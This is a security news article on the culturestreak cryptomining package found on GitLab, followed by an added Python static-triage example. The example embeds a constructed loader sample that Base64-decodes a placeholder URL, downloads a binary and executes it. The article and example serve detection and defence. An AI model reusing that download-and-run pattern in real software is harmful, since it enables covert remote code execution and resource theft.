
Culturestreak Malware Identified Within GitLab Python Package


A recent discovery by security researchers has revealed yet another example of a malicious open source package being used to hijack system resources for cryptocurrency mining. The package, named “culturestreak,” was found in an active repository on the GitLab developer site and originates from a user named Aldri Terakhir.

If downloaded and deployed, “culturestreak” runs in a continuous loop that consumes the host's system resources to mine Dero cryptocurrency as part of a larger cryptomining operation. Because the mining is unauthorized, it slows down affected computers, drains system resources without the owner's consent, and potentially exposes users to further risks.

The discovery of this malicious package highlights the ongoing supply chain threat posed by opportunistic threat actors who inject malicious code into open source packages used by developers to build software. This tactic allows them to reach as many victims as possible with minimal effort. To combat this, Checkmarx, a cybersecurity company, has even launched a threat intelligence API to identify malicious packages before they enter the software supply chain.

Python packages have become a popular vehicle for hiding malicious payloads because the language is so widely used for building software. Python developers often share code packages online via repositories like GitLab and GitHub, making the ecosystem easily accessible to threat actors who want to exploit it. In a separate malicious campaign, threat actors targeted users of the Python Package Index (PyPI) in a social engineering attack aimed at stealing credentials and loading compromised packages onto the repository itself.

Upon deployment, culturestreak employs various obfuscation techniques to evade detection. It decodes several Base64-encoded strings, which are then used in subsequent steps of the operation. The package also sets the filename for the downloaded malicious binary to a random integer to hinder detection based on fixed naming conventions. After downloading a binary file called “bwt2,” the researchers discovered it had been packed using the UPX executable packer. Once unpacked, they found a known tool for mining Dero crypto called “astrominer 1.9.2 R4.”
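The loader behaviour described above (Base64-decoded strings, a binary saved under a random-integer filename, then execution) can be triaged statically before a package is ever installed. The following is an added example, not Checkmarx's tooling or code from the culturestreak package: it walks the Python AST of a constructed sample, flags the relevant call targets, and decodes any Base64 literal so the reviewer sees the hidden value; the sample's URL and the flagged call names are assumptions for illustration.

```python
import ast
import base64

# Constructed sample mimicking the loader behaviour described above; the
# Base64 string hides a placeholder URL, not an indicator from the report.
HIDDEN = base64.b64encode(b"http://example.invalid/bwt2").decode()
SAMPLE = f'''import base64, random, urllib.request, subprocess
u = base64.b64decode("{HIDDEN}").decode()
name = str(random.randint(100000, 999999))
urllib.request.urlretrieve(u, name)
subprocess.call(["./" + name])
'''

# Call targets worth flagging, mapped to the behaviour they indicate.
SUSPICIOUS_CALLS = {
    "base64.b64decode": "Base64 literal decoding",
    "random.randint": "random-integer filename",
    "urllib.request.urlretrieve": "file download",
    "subprocess.call": "subprocess execution",
}

def _dotted(node):
    """Rebuild a dotted call target such as urllib.request.urlretrieve."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None

def triage(source):
    """Return sorted (lineno, indicator, detail) findings for Python source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        target = _dotted(node.func)
        if target not in SUSPICIOUS_CALLS:
            continue
        detail = ""
        # Decode a Base64 string literal so the hidden value is visible.
        if target == "base64.b64decode" and node.args:
            arg = node.args[0]
            if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                try:
                    detail = base64.b64decode(arg.value).decode("utf-8", "replace")
                except ValueError:
                    detail = "<not valid Base64>"
        findings.append((node.lineno, SUSPICIOUS_CALLS[target], detail))
    return sorted(findings)
```

A single flagged call is common in benign code; the combination of decode, download to an unpredictable name and execution in one file is what warrants a closer look.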

The unpacked binary runs in an infinite loop, using hardcoded pool URLs and wallet addresses to exploit system resources for unauthorized cryptocurrency mining. This means that the package turns users’ computers into a cog in a larger mining operation without their consent. The discovery of this malicious code package emphasizes the importance of developers vetting code and packages from verified sources and staying informed about potential threats to their software development.

Checkmarx has provided a list of indicators of compromise (IoCs) to help users identify if the culturestreak malicious code package is running on their system. These IoCs can aid in detecting and mitigating the risks associated with this malicious package. As the threat landscape continues to evolve, it is crucial for both developers and users to remain vigilant and proactive in their cybersecurity practices to protect against such threats.
